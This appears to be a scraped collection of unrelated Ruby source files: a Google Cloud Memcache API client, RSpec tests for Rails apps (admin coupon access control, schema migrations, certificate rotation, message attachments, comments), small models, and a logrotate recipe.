# @param name [::String]
# Required. Resource name of the Memcached instance for which the parameters should be
# updated.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. Mask of fields to update.
# @param parameters [::Google::Cloud::Memcache::V1::MemcacheParameters, ::Hash]
# The parameters to apply to the instance.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def update_parameters request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::UpdateParametersRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.update_parameters.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Memcache::V1::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"name" => request.name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.update_parameters.timeout,
metadata: metadata,
retry_policy: @config.rpcs.update_parameters.retry_policy
options.apply_defaults metadata: @config.metadata,
retry_policy: @config.retry_policy
@cloud_memcache_stub.call_rpc :update_parameters, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Deletes a single Instance.
#
# @overload delete_instance(request, options = nil)
# Pass arguments to `delete_instance` via a request object, either of type
# {::Google::Cloud::Memcache::V1::DeleteInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::DeleteInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_instance(name: nil)
# Pass arguments to `delete_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. Memcached instance resource name in the format:
# `projects/{project_id}/locations/{location_id}/instances/{instance_id}`
# where `location_id` refers to a GCP region
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def delete_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::DeleteInstanceRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.delete_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Memcache::V1::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"name" => request.name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.delete_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.delete_instance.retry_policy
options.apply_defaults metadata: @config.metadata,
retry_policy: @config.retry_policy
@cloud_memcache_stub.call_rpc :delete_instance, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# ApplyParameters will restart the set of specified nodes in order to update
# them to the current set of parameters for the Memcached Instance.
#
# @overload apply_parameters(request, options = nil)
# Pass arguments to `apply_parameters` via a request object, either of type
# {::Google::Cloud::Memcache::V1::ApplyParametersRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::ApplyParametersRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload apply_parameters(name: nil, node_ids: nil, apply_all: nil)
# Pass arguments to `apply_parameters` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. Resource name of the Memcached instance for which parameter group updates
# should be applied.
# @param node_ids [::Array<::String>]
# Nodes to which we should apply the instance-level parameter group.
# @param apply_all [::Boolean]
# Whether to apply instance-level parameter group to all nodes. If set to
# true, will explicitly restrict users from specifying any nodes, and apply
# parameter group updates to all nodes within the instance.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def apply_parameters request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::ApplyParametersRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.apply_parameters.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Memcache::V1::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"name" => request.name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.apply_parameters.timeout,
metadata: metadata,
retry_policy: @config.rpcs.apply_parameters.retry_policy
options.apply_defaults metadata: @config.metadata,
retry_policy: @config.retry_policy
@cloud_memcache_stub.call_rpc :apply_parameters, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Configuration class for the CloudMemcache API.
#
# This class represents the configuration for CloudMemcache,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Cloud::Memcache::V1::CloudMemcache::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# # Examples
#
# To modify the global config, setting the timeout for list_instances
# to 20 seconds, and all remaining timeouts to 10 seconds:
#
# ::Google::Cloud::Memcache::V1::CloudMemcache::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.list_instances.timeout = 20.0
# end
#
# To apply the above configuration only to a new client:
#
# client = ::Google::Cloud::Memcache::V1::CloudMemcache::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.list_instances.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"memcache.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentails object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "memcache.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
config_attr :interceptors, nil, ::Array, nil
config_attr :timeout, nil, ::Numeric, nil
config_attr :metadata, nil, ::Hash, nil
config_attr :retry_policy, nil, ::Hash, ::Proc, nil
config_attr :quota_project, nil, ::String, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
##
# Configurations for individual RPCs
# @return [Rpcs]
#
def rpcs
@rpcs ||= begin
parent_rpcs = nil
parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
Rpcs.new parent_rpcs
end
end
##
# Configuration RPC class for the CloudMemcache API.
#
# Includes fields providing the configuration for each RPC in this service.
# Each configuration object is of type `Gapic::Config::Method` and includes
# the following configuration fields:
#
# * `timeout` (*type:* `Numeric`) - The call timeout in seconds
# * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
# * `retry_policy (*type:* `Hash`) - The retry policy. The policy fields
# include the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
#
class Rpcs
##
# RPC-specific configuration for `list_instances`
# @return [::Gapic::Config::Method]
#
attr_reader :list_instances
##
# RPC-specific configuration for `get_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :get_instance
##
# RPC-specific configuration for `create_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :create_instance
##
# RPC-specific configuration for `update_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :update_instance
##
# RPC-specific configuration for `update_parameters`
# @return [::Gapic::Config::Method]
#
attr_reader :update_parameters
##
# RPC-specific configuration for `delete_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :delete_instance
##
# RPC-specific configuration for `apply_parameters`
# @return [::Gapic::Config::Method]
#
attr_reader :apply_parameters
# @private
def initialize parent_rpcs = nil
list_instances_config = parent_rpcs.list_instances if parent_rpcs.respond_to? :list_instances
@list_instances = ::Gapic::Config::Method.new list_instances_config
get_instance_config = parent_rpcs.get_instance if parent_rpcs.respond_to? :get_instance
@get_instance = ::Gapic::Config::Method.new get_instance_config
create_instance_config = parent_rpcs.create_instance if parent_rpcs.respond_to? :create_instance
@create_instance = ::Gapic::Config::Method.new create_instance_config
update_instance_config = parent_rpcs.update_instance if parent_rpcs.respond_to? :update_instance
@update_instance = ::Gapic::Config::Method.new update_instance_config
update_parameters_config = parent_rpcs.update_parameters if parent_rpcs.respond_to? :update_parameters
@update_parameters = ::Gapic::Config::Method.new update_parameters_config
delete_instance_config = parent_rpcs.delete_instance if parent_rpcs.respond_to? :delete_instance
@delete_instance = ::Gapic::Config::Method.new delete_instance_config
apply_parameters_config = parent_rpcs.apply_parameters if parent_rpcs.respond_to? :apply_parameters
@apply_parameters = ::Gapic::Config::Method.new apply_parameters_config
yield self if block_given?
end
end
end
end
end
end
end
end
end
| 52.075328 | 132 | 0.567766 |
5d155d28f8d3e0ff99466be5c3acbe3f9fa2d7ac | 993 | require 'rails_helper'
RSpec.describe "Admin V1 Coupons as :client", type: :request do
let(:user) { create(:user, profile: :client) }
context "GET /coupons" do
let(:url) { "/admin/v1/coupons" }
let!(:coupon) { create_list(:coupon, 5) }
before(:each) { get url, headers: auth_header(user) }
include_examples "forbidden access"
end
context "POST /coupons" do
let(:url) { "/admin/v1/coupons" }
before(:each) { post url, headers: auth_header(user) }
include_examples "forbidden access"
end
context "PATCH /coupons/:id" do
let!(:coupon) { create(:coupon) }
let(:url) { "/admin/v1/coupons/#{coupon.id}" }
before(:each) { patch url, headers: auth_header(user) }
include_examples "forbidden access"
end
context "DELETE /coupons/:id" do
let!(:coupon) { create(:coupon) }
let(:url) { "/admin/v1/coupons/#{coupon.id}" }
before(:each) { delete url, headers: auth_header(user) }
include_examples "forbidden access"
end
end
| 30.090909 | 63 | 0.649547 |
1afcbfd44cf80e04192156b34d360e61a563638f | 887 | module AeEasy
module Qa
class ValidateExternal
attr_reader :data, :errors, :rules, :outputs, :collection_name, :options
def initialize(data, config, outputs, collection_name, options)
@data = data
@rules = config['individual_validations'] if config
@outputs = outputs
@collection_name = collection_name
@options = options
@errors = { errored_items: [] }
end
def run
begin
if data.any?
ValidateGroups.new(data, nil, collection_name, errors).run
ValidateRules.new(data, errors, rules).run if rules
end
SaveOutput.new(data.count, rules, errors, collection_name, outputs, options).run
return errors
rescue StandardError => e
puts "An error has occurred: #{e}"
return nil
end
end
end
end
end
| 28.612903 | 90 | 0.600902 |
87948f74fa492ff92480feba39e2592ad44ae2a9 | 5,525 | describe 'Ridgepole::Client#diff -> migrate' do
context 'when change fk' do
let(:actual_dsl) {
erbh(<<-EOS)
create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
create_table "child", force: :cascade do |t|
t.integer "parent_id"
t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
end
add_foreign_key "child", "parent", name: "child_ibfk_1", on_delete: :cascade
EOS
}
let(:sorted_actual_dsl) {
erbh(<<-EOS)
create_table "child", force: :cascade do |t|
t.integer "parent_id"
t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
end
create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
add_foreign_key "child", "parent", name: "child_ibfk_1", on_delete: :cascade
EOS
}
let(:expected_dsl) {
erbh(<<-EOS)
create_table "child", force: :cascade do |t|
t.integer "parent_id"
t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
end
create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
add_foreign_key "child", "parent", name: "child_ibfk_1"
EOS
}
before { subject.diff(actual_dsl).migrate }
subject { client }
it {
delta = subject.diff(expected_dsl)
expect(delta.differ?).to be_truthy
expect(subject.dump).to match_fuzzy sorted_actual_dsl
delta.migrate
expect(subject.dump).to match_fuzzy expected_dsl
}
end
context 'when change fk without name' do
let(:actual_dsl) {
erbh(<<-EOS)
create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
create_table "child", force: :cascade do |t|
t.integer "parent_id"
t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
end
add_foreign_key "child", "parent", on_delete: :cascade
EOS
}
let(:sorted_actual_dsl) {
erbh(<<-EOS)
create_table "child", force: :cascade do |t|
t.integer "parent_id"
t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
end
create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
add_foreign_key "child", "parent", on_delete: :cascade
EOS
}
let(:expected_dsl) {
erbh(<<-EOS)
create_table "child", force: :cascade do |t|
t.integer "parent_id"
t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
end
create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
add_foreign_key "child", "parent"
EOS
}
before { subject.diff(actual_dsl).migrate }
subject { client }
it {
delta = subject.diff(expected_dsl)
expect(delta.differ?).to be_truthy
expect(subject.dump).to match_fuzzy sorted_actual_dsl
delta.migrate
expect(subject.dump).to match_fuzzy expected_dsl
}
end
context 'when drop/add fk with parent table' do
let(:actual_dsl) {
erbh(<<-EOS)
create_table "child", force: :cascade do |t|
t.integer "parent_id"
t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
end
create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
add_foreign_key "child", "parent", name: "child_ibfk_1"
EOS
}
let(:expected_dsl) {
erbh(<<-EOS)
create_table "child", force: :cascade do |t|
t.integer "parent2_id"
t.index ["parent2_id"], name: "par2_id", <%= i cond(5.0, using: :btree) %>
end
create_table "parent2", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
add_foreign_key "child", "parent2", name: "child_ibfk_2"
EOS
}
before { subject.diff(actual_dsl).migrate }
subject { client }
it {
delta = subject.diff(expected_dsl)
expect(delta.differ?).to be_truthy
expect(subject.dump).to match_fuzzy actual_dsl
delta.migrate
expect(subject.dump).to match_fuzzy expected_dsl
}
end
context 'when drop/add fk with parent table without name' do
let(:actual_dsl) {
erbh(<<-EOS)
create_table "child", force: :cascade do |t|
t.integer "parent_id"
t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
end
create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
add_foreign_key "child", "parent"
EOS
}
let(:expected_dsl) {
erbh(<<-EOS)
create_table "child", force: :cascade do |t|
t.integer "parent2_id"
t.index ["parent2_id"], name: "par2_id", <%= i cond(5.0, using: :btree) %>
end
create_table "parent2", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
end
add_foreign_key "child", "parent2"
EOS
}
before { subject.diff(actual_dsl).migrate }
subject { client }
it {
delta = subject.diff(expected_dsl)
expect(delta.differ?).to be_truthy
expect(subject.dump).to match_fuzzy actual_dsl
delta.migrate
expect(subject.dump).to match_fuzzy expected_dsl
}
end
end
| 28.188776 | 88 | 0.565611 |
f77c1b59f0a2054b3ccbf0a40dfcfd223ef6e814 | 4,278 | require 'rails_helper'
RSpec.describe 'Before you start page', type: :system do
include CertificateSupport
let(:user) { login_certificate_manager_user }
let(:msa_encryption_certificate) { create(:msa_encryption_certificate, component: create(:msa_component, team_id: user.team)) }
let(:sp_encryption_certificate) { create(:sp_encryption_certificate, component: create(:sp_component, team_id: user.team)) }
let(:vsp_encryption_certificate) { create(:vsp_encryption_certificate, component: create(:sp_component, vsp: true, team_id: user.team)) }
let(:msa_signing_certificate) { create(:msa_signing_certificate, component: create(:msa_component, team_id: user.team)) }
let(:sp_signing_certificate) { create(:sp_signing_certificate, component: create(:sp_component, team_id: user.team)) }
let(:vsp_signing_certificate) { create(:vsp_signing_certificate, component: create(:sp_component, vsp: true, team_id: user.team)) }
before(:each) do
login_certificate_manager_user
ReplaceEncryptionCertificateEvent.create(
component: sp_encryption_certificate.component,
encryption_certificate_id: sp_encryption_certificate.id
)
ReplaceEncryptionCertificateEvent.create(
component: msa_encryption_certificate.component,
encryption_certificate_id: msa_encryption_certificate.id
)
ReplaceEncryptionCertificateEvent.create(
component: vsp_encryption_certificate.component,
encryption_certificate_id: vsp_encryption_certificate.id
)
end
context 'encryption journey' do
it 'shows before you start page for msa encryption and successfully goes to next page' do
visit before_you_start_path(msa_encryption_certificate.id)
expect(page).to have_content 'Matching Service Adapter (MSA) encryption certificate'
click_link 'I have updated my MSA configuration'
expect(current_path).to eql upload_certificate_path(msa_encryption_certificate.id)
end
it 'shows before you start page for vsp encryption and successfully goes to next page' do
visit before_you_start_path(vsp_encryption_certificate.id)
expect(page).to have_content 'Verify Service Provider (VSP) encryption certificate'
click_link 'I have updated my VSP configuration'
expect(current_path).to eql upload_certificate_path(vsp_encryption_certificate.id)
end
it 'shows before you start page for sp encryption and successfully goes to next page' do
visit before_you_start_path(sp_encryption_certificate.id)
expect(page).to have_content 'service provider encryption certificate'
click_link 'I have updated my service provider configuration'
expect(current_path).to eql upload_certificate_path(sp_encryption_certificate.id)
end
it 'sp encryption journey with dual running set to no displays unqiue content' do
visit before_you_start_path(sp_encryption_certificate.id, true)
expect(page).to have_content 'Because your service provider does not support dual running, there will be an outage when you rotate the encryption key.'
end
end
context 'signing journey' do
it 'shows before you start page for msa signing and successfully goes to next page' do
visit before_you_start_path(msa_signing_certificate.id)
expect(page).to have_content 'Matching Service Adapter (MSA) signing certificate'
click_link t('user_journey.before_you_start.have_updated', component: msa_signing_certificate.component.display)
expect(current_path).to eql upload_certificate_path(msa_signing_certificate.id)
end
it 'shows before you start page for vsp signing and successfully goes to next page' do
visit before_you_start_path(vsp_signing_certificate.id)
expect(page).to have_content 'Verify Service Provider (VSP) signing certificate'
click_link 'Continue'
expect(current_path).to eql upload_certificate_path(vsp_signing_certificate.id)
end
it 'shows before you start page for sp signing and successfully goes to next page' do
visit before_you_start_path(sp_signing_certificate.id)
expect(page).to have_content 'service provider signing certificate'
click_link 'Continue'
expect(current_path).to eql upload_certificate_path(sp_signing_certificate.id)
end
end
end
| 52.814815 | 157 | 0.77957 |
bf9ae9091f10d52cef0b7b5c1d55c74a8b803577 | 1,211 | module AsposeWordsCloud
#
class ProtectionRequest < BaseObject
attr_accessor :password, :new_password, :protection_type
# attribute mapping from ruby-style variable name to JSON key
def self.attribute_map
{
#
:'password' => :'Password',
#
:'new_password' => :'NewPassword',
#
:'protection_type' => :'ProtectionType'
}
end
# attribute type
def self.swagger_types
{
:'password' => :'String',
:'new_password' => :'String',
:'protection_type' => :'String'
}
end
def initialize(attributes = {})
return if !attributes.is_a?(Hash) || attributes.empty?
# convert string to symbol for hash key
attributes = attributes.inject({}){|memo,(k,v)| memo[k.to_sym] = v; memo}
if attributes[:'Password']
self.password = attributes[:'Password']
end
if attributes[:'NewPassword']
self.new_password = attributes[:'NewPassword']
end
if attributes[:'ProtectionType']
self.protection_type = attributes[:'ProtectionType']
end
end
end
end
| 22.425926 | 79 | 0.554913 |
288738db377e6faa9f106cb1c29773e35bc531df | 2,998 | require File.expand_path('./spec_helper', File.dirname(__FILE__))
# Specs some of the behavior of awesome_nested_set although does so to
# demonstrate the use of this gem
describe Comment do
before do
@user = User.create!
@comment = Comment.create!(body: 'Root comment', user: @user)
end
describe 'that is valid' do
it 'should have a user' do
expect(@comment.user).not_to be_nil
end
it 'should have a body' do
expect(@comment.body).not_to be_nil
end
end
it 'should not have a parent if it is a root Comment' do
expect(@comment.parent).to be_nil
end
it 'can have see how child Comments it has' do
expect(@comment.children.size).to eq(0)
end
it 'can add child Comments' do
grandchild = Comment.new(body: 'This is a grandchild', user: @user)
grandchild.save!
grandchild.move_to_child_of(@comment)
expect(@comment.children.size).to eq(1)
end
describe 'after having a child added' do
before do
@child = Comment.create!(body: 'Child comment', user: @user)
@child.move_to_child_of(@comment)
end
it 'can be referenced by its child' do
expect(@child.parent).to eq(@comment)
end
it 'can see its child' do
expect(@comment.children.first).to eq(@child)
end
end
describe 'finders' do
describe '#find_comments_by_user' do
before :each do
@other_user = User.create!
@user_comment = Comment.create!(body: 'Child comment', user: @user)
@non_user_comment = Comment.create!(body: 'Child comment',
user: @other_user)
@comments = Comment.find_comments_by_user(@user)
end
it 'should return all the comments created by the passed user' do
expect(@comments).to include(@user_comment)
end
it 'should not return comments created by non-passed users' do
expect(@comments).not_to include(@non_user_comment)
end
end
describe '#find_comments_for_commentable' do
before :each do
@other_user = User.create!
@user_comment =
Comment.create!(body: 'from user',
commentable_type: @other_user.class.to_s,
commentable_id: @other_user.id,
user: @user)
@other_comment =
Comment.create!(body: 'from other user',
commentable_type: @user.class.to_s,
commentable_id: @user.id,
user: @other_user)
@comments =
Comment.find_comments_for_commentable(@other_user.class,
@other_user.id)
end
it 'should return the comments for the passed commentable' do
expect(@comments).to include(@user_comment)
end
it 'should not return the comments for non-passed commentables' do
expect(@comments).not_to include(@other_comment)
end
end
end
end
| 29.98 | 75 | 0.61441 |
182a2af9da678b46d385e902be50ff9b594d1e59 | 157 | class SwapProjectDataManagementPlansRelationship < ActiveRecord::Migration[6.0]
def change
remove_reference :projects, :data_management_plan
end
end
| 26.166667 | 79 | 0.821656 |
e2e784d19f2916265a72824cc89c63768fe3d6d7 | 1,609 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# GRPC contains the General RPC module.
module GRPC
VERSION = '1.5.0.dev'
end
| 47.323529 | 72 | 0.778745 |
39acc66236e6a6f1a25e874c8685c70d1aeb2313 | 372 | case node[:platform]
when "ubuntu"
package "logrotate"
LOGROTATE_CONF_BASEDIR = "/etc/logrotate.d"
end
node.logrotate.apps&.each do |app|
logroate_conf_dir = "#{LOGROTATE_CONF_BASEDIR}/#{app.name}"
template logrotate_conf_dir do
action :craete
mode "644"
source "templates/etc/logrotate.d/logrotate.conf"
variables(configs: app.configs)
end
end
| 23.25 | 61 | 0.731183 |
6a67021a71277e385139adf4788d37d0fd182700 | 245 | class RedactorRails::Asset
include Mongoid::Document
include Mongoid::Timestamps
include RedactorRails::Orm::Mongoid::AssetBase
delegate :url, :current_path, :size, :content_type, :filename, to: :data
validates_presence_of :data
end
| 24.5 | 74 | 0.771429 |
7a702a7ea51d2ee16ae944a46432b209b99ee3e6 | 2,440 | # frozen_string_literal: true
require 'rails_helper'
require 'support/sm_client_helpers'
require 'support/shared_examples_for_mhv'
RSpec.describe 'Message Attachments Integration' do
include SM::ClientHelpers
let(:va_patient) { true }
let(:current_user) { build(:user, :mhv, va_patient: va_patient, mhv_account_type: mhv_account_type) }
let(:user_id) { '10616687' }
let(:inbox_id) { 0 }
let(:message_id) { 573_302 }
before do
allow(SM::Client).to receive(:new).and_return(authenticated_client)
sign_in_as(current_user)
end
context 'Basic User' do
let(:mhv_account_type) { 'Basic' }
before { get '/v0/messaging/health/messages/629999/attachments/629993' }
include_examples 'for user account level', message: 'You do not have access to messaging'
include_examples 'for non va patient user', authorized: false, message: 'You do not have access to messaging'
end
context 'Advanced User' do
let(:mhv_account_type) { 'Advanced' }
before { get '/v0/messaging/health/messages/629999/attachments/629993' }
include_examples 'for user account level', message: 'You do not have access to messaging'
include_examples 'for non va patient user', authorized: false, message: 'You do not have access to messaging'
end
context 'Premium User' do
let(:mhv_account_type) { 'Premium' }
context 'not a va patient' do
before { get '/v0/messaging/health/messages/629999/attachments/629993' }
let(:va_patient) { false }
let(:current_user) do
build(:user, :mhv, :no_vha_facilities, va_patient: va_patient, mhv_account_type: mhv_account_type)
end
include_examples 'for non va patient user', authorized: false, message: 'You do not have access to messaging'
end
describe '#show' do
it 'responds sending data for an attachment' do
VCR.use_cassette('sm_client/messages/nested_resources/gets_a_single_attachment_by_id') do
get '/v0/messaging/health/messages/629999/attachments/629993'
end
expect(response).to be_successful
expect(response.headers['Content-Disposition'])
.to eq("attachment; filename=\"noise300x200.png\"; filename*=UTF-8''noise300x200.png")
expect(response.headers['Content-Transfer-Encoding']).to eq('binary')
expect(response.headers['Content-Type']).to eq('image/png')
expect(response.body).to be_a(String)
end
end
end
end
| 35.362319 | 115 | 0.707787 |
38a6645dbf5edd81a4675d13eefffb274fd1efd8 | 330 | class Admin::HomeBannersController < Admin::BaseController
